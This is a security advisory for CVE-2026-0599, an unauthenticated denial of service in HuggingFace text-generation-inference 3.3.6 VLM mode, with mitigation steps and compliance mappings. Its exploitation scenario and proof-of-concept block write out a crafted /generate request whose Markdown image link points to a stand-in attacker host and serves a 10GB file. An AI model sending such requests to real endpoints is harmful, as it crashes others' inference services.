CVE-2026-0599

GHSA-j7x9-7j54-2v3h HIGH
Published February 2, 2026
CISO Take

If you're running HuggingFace TGI in VLM (multimodal) mode, patch to 3.3.7 now — this is a trivial, unauthenticated DoS that can crash your inference host with a single crafted request. Default deployments have no memory limits and no authentication, meaning your entire AI inference stack is one HTTP request away from an OOM crash. Treat this as critical if your AI pipelines serve multimodal workloads without an auth layer or network egress controls.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
| --- | --- | --- | --- |
| text-generation | pip | < 3.3.7 | 3.3.7 |


Severity & Risk

CVSS 3.1: 7.5 / 10
EPSS: 0.2% chance of exploitation in 30 days
KEV Status: Not in KEV
Sophistication: Trivial

Recommended Action

  1. PATCH: Upgrade to text-generation-inference 3.3.7 immediately — this is the definitive fix.
  2. INTERIM if patching is blocked: Enable API authentication via the --authentication-config flag to require bearer tokens; this prevents unauthenticated exploitation.
  3. ADD EGRESS CONTROLS: Restrict outbound HTTP from the TGI process/container to internal or allowlisted endpoints only — this breaks the attack chain by preventing external image fetching.
  4. ENFORCE MEMORY LIMITS: Set container memory limits (Docker: --memory=Xg; Kubernetes: resources.limits.memory) to contain the blast radius and prevent host OOM.
  5. DEPLOY API GATEWAY: Place TGI behind an API gateway or reverse proxy with rate limiting and request body size limits (e.g., nginx client_max_body_size, Kong rate-limit plugin).
  6. DETECTION: Alert on anomalous memory growth spikes in inference containers, unusual outbound bandwidth from inference pods, and repeated 429/413 response codes paired with sustained resource utilization.
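Assuming a containerized deployment and the published 3.3.7 image tag, the patch and memory-limit steps above might look like the following sketch. The model id is a placeholder, and the `--authentication-config` flag mentioned in the advisory should be verified against your TGI version's `--help` output before relying on it.

```shell
# Hardening sketch: run the patched image with a hard memory cap, so an
# OOM condition kills the container rather than the host.
docker run --rm -p 8080:80 \
  --memory=32g --memory-swap=32g \
  ghcr.io/huggingface/text-generation-inference:3.3.7 \
  --model-id <your-vlm-model-id>

# Kubernetes equivalent of the memory cap (pod spec fragment):
#   resources:
#     limits:
#       memory: "32Gi"
```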

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - AI system operational management
A.9.2 - AI System Availability and Resilience
NIST AI RMF
GOVERN 1.1 - AI risk is integrated into organizational risk management
GOVERN 1.4 - Risks associated with AI system vulnerabilities are identified and managed
MANAGE 2.2 - Mechanisms to detect, respond to, and recover from AI system failures
OWASP LLM Top 10
LLM04 - Model Denial of Service

Technical Details

NVD Description

A vulnerability in huggingface/text-generation-inference version 3.3.6 allows unauthenticated remote attackers to exploit unbounded external image fetching during input validation in VLM mode. The issue arises when the router scans inputs for Markdown image links and performs a blocking HTTP GET request, reading the entire response body into memory and cloning it before decoding. This behavior can lead to resource exhaustion, including network bandwidth saturation, memory inflation, and CPU overutilization. The vulnerability is triggered even if the request is later rejected for exceeding token limits. The default deployment configuration, which lacks memory usage limits and authentication, exacerbates the impact, potentially crashing the host machine. The issue is resolved in version 3.3.7.
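The flawed flow described above can be illustrated with a minimal sketch (this is not TGI's actual router code): the input is scanned for a Markdown image link, the URL is extracted, and in the vulnerable version the entire referenced body is fetched into memory before any token-limit check runs.

```shell
# Illustrative sketch of the vulnerable pattern (NOT TGI's real code):
# 1) scan the prompt for a Markdown image link,
# 2) extract its URL,
# 3) in the flawed flow, the ENTIRE body is then fetched into memory
#    before any size or token-limit check.
INPUT='What do you see? ![img](https://example.com/huge.bin)'
URL=$(printf '%s' "$INPUT" | grep -oE '!\[[^]]*\]\([^)]*\)' | sed -E 's/^!\[[^]]*\]\(([^)]*)\)$/\1/')
echo "$URL"
# curl -s "$URL" > body.bin   # unbounded buffering would happen at this step
```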

Exploitation Scenario

An attacker identifies a publicly accessible TGI endpoint running in VLM mode — discoverable via Shodan or by probing common ports (8080, 8000) with the /info endpoint. They craft a POST to /generate containing a prompt with a Markdown image reference: `What do you see? ![img](http://attacker-controlled.com/10gb-random.bin)`. The TGI router parses the Markdown, initiates a blocking HTTP GET to the attacker's server, and streams the full 10GB response into memory before any token-limit validation occurs. The attacker runs this concurrently from multiple IPs or even a single client with multiple threads. Within seconds to minutes (depending on bandwidth), the TGI process exhausts available RAM, triggering OOM kills and crashing the inference service — with no authentication required and no prior knowledge of the model or API needed.
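The request shape described above can be sketched as follows. The host and attacker URL are hypothetical placeholders, and the curl line is left commented out so the script only constructs the payload; the `inputs`/`parameters` body matches TGI's documented /generate schema.

```shell
# PoC request shape (hypothetical endpoint; do not aim at systems you don't own).
PAYLOAD='{"inputs":"What do you see? ![img](http://attacker-controlled.example/10gb-random.bin)","parameters":{"max_new_tokens":1}}'
printf '%s\n' "$PAYLOAD"
# curl -s -X POST "http://tgi-host:8080/generate" \
#   -H 'Content-Type: application/json' -d "$PAYLOAD"
```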

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Timeline

Published
February 2, 2026
Last Modified
February 3, 2026
First Seen
February 2, 2026